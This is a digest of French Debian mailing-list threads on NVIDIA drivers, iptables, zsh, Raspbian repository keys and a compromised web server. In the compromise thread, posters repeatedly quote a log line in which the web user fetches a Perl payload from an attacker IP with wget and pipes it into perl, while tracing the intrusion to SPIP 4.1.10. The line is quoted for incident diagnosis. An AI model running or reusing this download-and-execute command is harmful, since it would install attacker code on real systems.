Re: Machine vérolée

[Erwann Le Bras]

Je ne l'aurais pas cru...


Le 27/06/2023 à 16:40, BERTRAND Joël a écrit :

BERTRAND Joël a écrit :

OK, je l'ai.

2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
/dev/shm;wget -O -http://68.235.39.225/sepax|perl
2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
/dev/shm;wget -O -http://68.235.39.225/sepax|perl

J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais
toujours pas qui le lance, mais on progresse.

Et le fautif semble être... SPIP ! Et je ne parle pas d'un SPIP
antédiluvien, mais d'un SPIP 4.1 à jour (4.1.10). J'en ai deux qui se
font fait percer. Mais pas de la même manière. Le premier avait des
fichiers .php étranges dans sa racine : spip__.php et des choses comme
response.php. Le second avait un spip_loader.php qui embarquait un binaire.

Re: nvidia ou nouveau sur bookworm ?

[Étienne Mollier]

Bonjour Daniel,

Daniel Caillibaud, on 2023-06-27:
> Bonjour,
> 
> Sur un nouveau PC avec une carte GP106M (GeForce GTX 1060 Mobile) fraîchement 
> installé avec
> bookworm, et je me demandais s'il valait mieux installer
> xserver-xorg-video-nvidia et nvidia-kernel-dkms pour remplacer nouveau (mis 
> par l'installeur).

J'allais proposer la troisième option qui consisterait à
installer le paquet nvidia-open-kernel-dkms, de la section
contrib…  :)

… mais la GTX 1060 Mobile n'apparait pas dans la liste des
matériels supportés [1].  :(

[1] : 
https://github.com/NVIDIA/open-gpu-kernel-modules/blob/main/README.md#compatible-gpus

Du coup, oui, il vaut mieux installer xserver-xorg-video-nvidia
et nvidia-kernel-dkms pour remplacer nouveau si on est peu
regardant sur l'usage de ce pilotes propriétaires, et que le
pilote nouveau ne permet pas de travailler confortablement.
Tout du moins, ça vaut le coup d'essayer.

Bonne journée,  :)
-- 
Étienne Mollier 
Fingerprint:  8f91 b227 c7d6 f2b1 948c  8236 793c f67e 8f0d 11da
Sent from /dev/pts/2, please excuse my verbosity.
On air: Bader Nana - Mercenaries


signature.asc
Description: PGP signature

Re: iptables vs iptables-legacy

[TOOTAi]

C' est ce que j' ai compris

⁣--
Daniel Huhardeaux​

Le 27 juin 2023 à 20:52, à 20:52, "BERTRAND Joël"  a 
écrit:
>NoSpam a écrit :
>> Bonsoir
>>
>>
>https://developers.redhat.com/blog/2020/08/18/iptables-the-two-variants-and-their-relationship-with-nftables#using_iptables_nft
>
>   Merci.
>
>   Mais ça ne répond pas trop à ma question sauf s'il faut comprendre
>entre les lignes que les paquets passent d'abord par les xtables avant
>de passer par les nftables.

Re: iptables vs iptables-legacy

[BERTRAND Joël]

NoSpam a écrit :
> Bonsoir
> 
> https://developers.redhat.com/blog/2020/08/18/iptables-the-two-variants-and-their-relationship-with-nftables#using_iptables_nft

Merci.

Mais ça ne répond pas trop à ma question sauf s'il faut comprendre
entre les lignes que les paquets passent d'abord par les xtables avant
de passer par les nftables.

nvidia ou nouveau sur bookworm ?

[Daniel Caillibaud]

Bonjour,

Sur un nouveau PC avec une carte GP106M (GeForce GTX 1060 Mobile) fraîchement 
installé avec
bookworm, et je me demandais s'il valait mieux installer
xserver-xorg-video-nvidia et nvidia-kernel-dkms pour remplacer nouveau (mis par 
l'installeur).

J'ai un affichage pas terrible avec 3 écrans
- écran du PC 1920×1080 : affichage passable, caractères un peu crénelés
- écran 1200×1920 (portrait) : couleurs pas géniales (pas grave pour moi) et 
polices toutes
  baveuses (nettement plus gênant), mais là je soupçonne la connectique, y'a un 
adaptateur
  mini display port vers VGA, c'est probablement lui le fautif, faut que je me 
procure du mini
  DP => DVI
- écran 2560×1440 branché en HDMI : polices très crenelées, surtout dans le 
terminal (moins dans
  un navigateur)

J'ai testé différents réglages dans paramètres système / Sélection de polices 
(sous cinnamon),
mais je ne vois aucune différences, et je trouve ça louche, car normalement 
entre
"optimisation : aucun" et "optimisation : complète" la différence est 
flagrante, donc j'ai
l'impression qu'il n'y a aucun anti-aliasing, quel que soit ce réglage.

Un conseil ?

Merci


PS: lshw me dit 
produit: GP106M [GeForce GTX 1060 Mobile]
fabriquant: NVIDIA Corporation
identifiant matériel: 0
information bus: pci@:01:00.0
nom logique: /dev/fb0
version: a1
bits: 64 bits
horloge: 33MHz
fonctionnalités: pm msi pciexpress vga_controller bus_master 
cap_list rom fb
configuration: depth=32 driver=nouveau latency=0 
resolution=2560,1440

-- 
Daniel

Re: iptables vs iptables-legacy

[NoSpam]

Bonsoir

https://developers.redhat.com/blog/2020/08/18/iptables-the-two-variants-and-their-relationship-with-nftables#using_iptables_nft

peut aider à comprendre. Perso j'ai basculer sur nftables.

Le 27/06/2023 à 18:46, BERTRAND Joël a écrit :

Bonsoir à tous,

J'ai toujours écrit mes firewalls à la main. Aujourd'hui, un script
charge au démarrage le contenu de /var/lib/iptables/active au travers de
iptables (nf_tables).

Or iptables-legacy est toujours disponible.

J'avoue avoir un peu de mal à comprendre le lien entre les deux filtres.

Root rayleigh:[~] > iptables-legacy -L
Chain INPUT (policy ACCEPT)
target prot opt source   destination

Chain FORWARD (policy ACCEPT)
target prot opt source   destination

Chain OUTPUT (policy ACCEPT)
target prot opt source   destination
Root rayleigh:[~] > Root rayleigh:[~] > iptables -L
# Warning: iptables-legacy tables present, use iptables-legacy to see them
Chain INPUT (policy DROP)
target prot opt source   destination
f2b-recidive  tcp  --  anywhere anywhere
ACCEPT all  --  anywhere anywhere
ACCEPT all  --  anywhere anywhere
ACCEPT tcp  --  anywhere anywhere tcp dpt:ssh
ACCEPT tcp  --  anywhere anywhere tcp dpt:smtp
...
Chain f2b-recidive (1 references)
target prot opt source   destination
REJECT all  --  subnet.crackbox.io   anywhere
reject-with icmp-port-unreachable
REJECT all  --  193.56.29.178anywhere
reject-with icmp-port-unreachable
REJECT all  --  147.78.103.120   anywhere
reject-with icmp-port-unreachable
RETURN all  --  anywhere anywhere
Root rayleigh:[~] >

D'après iptables-legacy, tout est ouvert. D'après iptables, tout est
fermé sauf ce qui est explicitement ouvert.

La question est simple. Si je change la règle par défaut
iptables-legacy -DINPUT DROP, plus rien ne fonctionne. Les deux systèmes
sont-ils en série ? Un paquet traverse-t-il d'abord un système de filtre
puis l'autre en séquence ? Je n'ai pas trouvé l'information (je dois
chercher au mauvais endroit)...

Bien cordialement,

JB

iptables vs iptables-legacy

[BERTRAND Joël]

Bonsoir à tous,

J'ai toujours écrit mes firewalls à la main. Aujourd'hui, un script
charge au démarrage le contenu de /var/lib/iptables/active au travers de
iptables (nf_tables).

Or iptables-legacy est toujours disponible.

J'avoue avoir un peu de mal à comprendre le lien entre les deux filtres.

Root rayleigh:[~] > iptables-legacy -L
Chain INPUT (policy ACCEPT)
target prot opt source   destination

Chain FORWARD (policy ACCEPT)
target prot opt source   destination

Chain OUTPUT (policy ACCEPT)
target prot opt source   destination
Root rayleigh:[~] > Root rayleigh:[~] > iptables -L
# Warning: iptables-legacy tables present, use iptables-legacy to see them
Chain INPUT (policy DROP)
target prot opt source   destination
f2b-recidive  tcp  --  anywhere anywhere
ACCEPT all  --  anywhere anywhere
ACCEPT all  --  anywhere anywhere
ACCEPT tcp  --  anywhere anywhere tcp dpt:ssh
ACCEPT tcp  --  anywhere anywhere tcp dpt:smtp
...
Chain f2b-recidive (1 references)
target prot opt source   destination
REJECT all  --  subnet.crackbox.io   anywhere
reject-with icmp-port-unreachable
REJECT all  --  193.56.29.178anywhere
reject-with icmp-port-unreachable
REJECT all  --  147.78.103.120   anywhere
reject-with icmp-port-unreachable
RETURN all  --  anywhere anywhere
Root rayleigh:[~] >

D'après iptables-legacy, tout est ouvert. D'après iptables, tout est
fermé sauf ce qui est explicitement ouvert.

La question est simple. Si je change la règle par défaut
iptables-legacy -DINPUT DROP, plus rien ne fonctionne. Les deux systèmes
sont-ils en série ? Un paquet traverse-t-il d'abord un système de filtre
puis l'autre en séquence ? Je n'ai pas trouvé l'information (je dois
chercher au mauvais endroit)...

Bien cordialement,

JB

Re: Machine vérolée

[BERTRAND Joël]

BERTRAND Joël a écrit :
> BERTRAND Joël a écrit :
>> OK, je l'ai.
>>
>> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
>> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
>> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>>
>> J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais
>> toujours pas qui le lance, mais on progresse.
> 
>   Et le fautif semble être... SPIP ! Et je ne parle pas d'un SPIP
> antédiluvien, mais d'un SPIP 4.1 à jour (4.1.10). J'en ai deux qui se
> font fait percer. Mais pas de la même manière. Le premier avait des
> fichiers .php étranges dans sa racine : spip__.php et des choses comme
> response.php. Le second avait un spip_loader.php qui embarquait un binaire.
> 

Et j'aurais dû regarder de près les listes de diffusion de SPIP. Ça
couine très fort depuis quelques semaines sur le sujet. Comme quoi,
certains devraient plutôt s'attacher à la qualité du code qu'au côté
politique d'un projet...

Re: Machine vérolée

[BERTRAND Joël]

BERTRAND Joël a écrit :
> OK, je l'ai.
> 
> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> 
> J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais
> toujours pas qui le lance, mais on progresse.

Et le fautif semble être... SPIP ! Et je ne parle pas d'un SPIP
antédiluvien, mais d'un SPIP 4.1 à jour (4.1.10). J'en ai deux qui se
font fait percer. Mais pas de la même manière. Le premier avait des
fichiers .php étranges dans sa racine : spip__.php et des choses comme
response.php. Le second avait un spip_loader.php qui embarquait un binaire.

Re: Pas d'historique de zsh en root

[Daniel Caillibaud]

Le 23/06/23 à 10:40, Marc Chantreux  a écrit :
> passe pour les utilisateurs qui veulent des prompts aussi
> colorés qu'inutiles

Euh, là tu pousses un peu ;-)

oh my zsh c'est bien plus que du prompt coloré, avec des plugins vraiment 
pratiques (celui qui
me sert le plus au quotidien doit être git, mais j'en utilise pas mal d'autres).

Bien sûr, tu pourrais te configurer toi-même la collection d'alias et la 
complétion qui va
avec, mais c'est quand même très confortable de déléguer ça à des gens qui font 
ça bien et le
maintiennent ! Avec les versions de git les options possibles et les commandes 
disponibles
évoluent, et aller maintenir manuellement la collection de fonctions de 
complétion c'est quand
même fastidieux (donc on le fait pas et on se retrouve avec une complétion 
foireuse).

Et même pour les alias, je réalise que les leurs sont nettement mieux pensés 
que ceux que
j'utilisais avant, avec une logique de nommage assez rigoureuse et exhaustive, 
qui permet
de mémoriser les alias facilement. Mes alias perso étaient nommés 
rigoureusement au début,
mais au fil des ajouts la logique de départ est devenue de plus en plus floue, 
elle était mal
pensée car cantonnée aux besoins de l'époque).

Et un prompt qui t'indique la branche actuelle, si y'a des commits de retard ou 
en
avance et d'autres "fioritures", ça rend vraiment service et peut éviter des 
bêtises (idem, ça
peut se configurer à la main, je le faisais avant, et je me suis aperçu que 
d'autres faisaient
ça bcp mieux que moi).

> mais ça me semble assez inacceptable en root.

Tout à fait d'accord !

-- 
Daniel

Quand Microsoft sortira un truc qui ne se plante pas, ce sera un clou.

Re: Machine vérolée

[ptilou]

Le mardi 27 juin 2023 à 12:50:05 UTC+2, Michel Verdier a écrit :
> Le 27 juin 2023 BERTRAND Joël a écrit : 
> 
> > OK, je l'ai. 
> > 
> > 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd 
> > /dev/shm;wget -O - http://68.235.39.225/sepax|perl 
> > 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd 
> > /dev/shm;wget -O - http://68.235.39.225/sepax|perl 
> > 
> > J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais 
> > toujours pas qui le lance, mais on progresse.
> Bravo ! Le script est intéressant... 
> L'IP est listée : 
> https://check.spamhaus.org/listed/?searchterm=68.235.39.225 
> www.minpop.com semble utilisé dans le script et renvoie à des IP en Corée

Franchement , ceux qui veulent de l’infomatique ( qui le paye) vont se voir 
prescrire des truc contre les ulcaires quand on sait que le noeud est a 
Amesterdam …..

— 
Ptilou

Re: Signature des dépôts externes

[yamo']

Salut, 
didier gaumet a écrit :
> Bonjour,

> pas lu les liens, pressé ce matin,

> par contre la clé à récupérer est in diquée sur le site rasbpian:
> http://raspbian.org/RaspbianRepository

> c'est la ligne "wget...", il faut juste l'adapter pour utiliser 
> directement gpg au lieu de apt-key (commande rendue obsolète).

> voir le wiki Debian:
> https://wiki.debian.org/DebianRepository/UseThirdParty

> ça doit te donner un truc (en root) du style (attention, sur une seule 
> ligne, ne pas se fier au formatage dû aux mails/news):
> curl https://archive.raspbian.org/raspbian.public.key | gpg -o 
> /usr/share/keyrings/raspbian.public.key --dearmor

> à la louche, hein, j'ai pas testé :-)


Merci beaucoup. 
Je vais lire tout ça tranquillement.
Et je posterai mon retour ici. 

Pour la référence à apt-key, c'est sûrement du au fait que Raspbian a 
souvent un petit temps de retard sur Debian.

-- 
Stéphane

Re: Machine vérolée

[Michel Verdier]

Le 27 juin 2023 BERTRAND Joël a écrit :

> OK, je l'ai.
>
> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>
> J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais
> toujours pas qui le lance, mais on progresse.

Bravo ! Le script est intéressant...
L'IP est listée :
https://check.spamhaus.org/listed/?searchterm=68.235.39.225
www.minpop.com semble utilisé dans le script et renvoie à des IP en Corée

Re: Migration Debian 11 -> 12 : PB firmware

[fw]

Etienne,
Effectivement, comme dit précédemment, en dépit de ces messgaes
signalant des absences de composants logiciels, je ne constate pas de
dysfonctionnement du système graphique.
Merci donc de ces éclaircissements, et on peut donc clore l'incident,
Simplement, suggestion, une indication de ce mécanisme par un message du
genre 
"
W: Possible missing firmware /lib/firmware/amdgpu/ip_discovery.bin for
module amdgpu -> Using //.../xxx.bin in replacement
...
"
leverait définitivement l'ambiguité ... 
Je sais, je pousse peut-etre un peu loin vers la totale limpidité de ce
système, et on ne peut de toute façon que féliciter les développeurs
pour la prouesse technique : A ces petits message d'erreur près, la
mise en oeuvre de ces matériels propriétaires est complètement
transparente !
Encore Merci à eux pour la qualité d'un travail qui met à la portée de
tous un système parfaitement opérationnel et dont la richesse
applicative n'a rien à envier aux sytèmes propriétaire !

Cordialement,
Francis
-- 
francis Wong

Re: Signature des dépôts externes (was: Re: Étrange réponse de apt après passage de testing à stable)

[didier gaumet]

Bonjour,

pas lu les liens, pressé ce matin,

par contre la clé à récupérer est in diquée sur le site rasbpian:
http://raspbian.org/RaspbianRepository

c'est la ligne "wget...", il faut juste l'adapter pour utiliser 
directement gpg au lieu de apt-key (commande rendue obsolète).


voir le wiki Debian:
https://wiki.debian.org/DebianRepository/UseThirdParty

ça doit te donner un truc (en root) du style (attention, sur une seule 
ligne, ne pas se fier au formatage dû aux mails/news):
curl https://archive.raspbian.org/raspbian.public.key | gpg -o 
/usr/share/keyrings/raspbian.public.key --dearmor


à la louche, hein, j'ai pas testé :-)

Re: Machine vérolée

[BERTRAND Joël]

OK, je l'ai.

2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
/dev/shm;wget -O - http://68.235.39.225/sepax|perl
2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
/dev/shm;wget -O - http://68.235.39.225/sepax|perl

J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais
toujours pas qui le lance, mais on progresse.

Signature des dépôts externes (was: Re: Étrange réponse de apt après passage de testing à stable)

[yamo']

Salut,
yamo' a écrit :
> Salut,

> J'ai la commande  apt full-upgrade qui me réponds :
> ...
> 0 mis à jour, 0 nouvellement installés, 760 remis à une version
> inférieure, 0 à enlever et 0 non mis à jour.
> Il est nécessaire de prendre 237 Mo dans les archives.
> Après cette opération, 80,9 Mo d'espace disque seront libérés.
> Souhaitez-vous continuer ? [O/n]

En fait, j'ai l'impression que c'est par ce que les dépôts raspbian sont 
refusés à cause d'une erreur de stockage de clé qui n'est plus acceptée 
sur Debian 12.

Comme c'était un simple warning, je ne pensais pas que ça avait des 
conséquences...

http://al.howardknight.net/?STYPE=msgid=%3CAABkmVWhMG0AAkjf.A3.flnews%40yamo.pasdenom.info%3E

https://news2web.pasdenom.info/article.php?id=35401=fr.comp.os.linux.configuration


Par contre, je n'ai pas encore réussi à corriger le problème. J'avoue 
avoir du mal à suivre les pistes trouvées :

 
 

 

-- 
Stéphane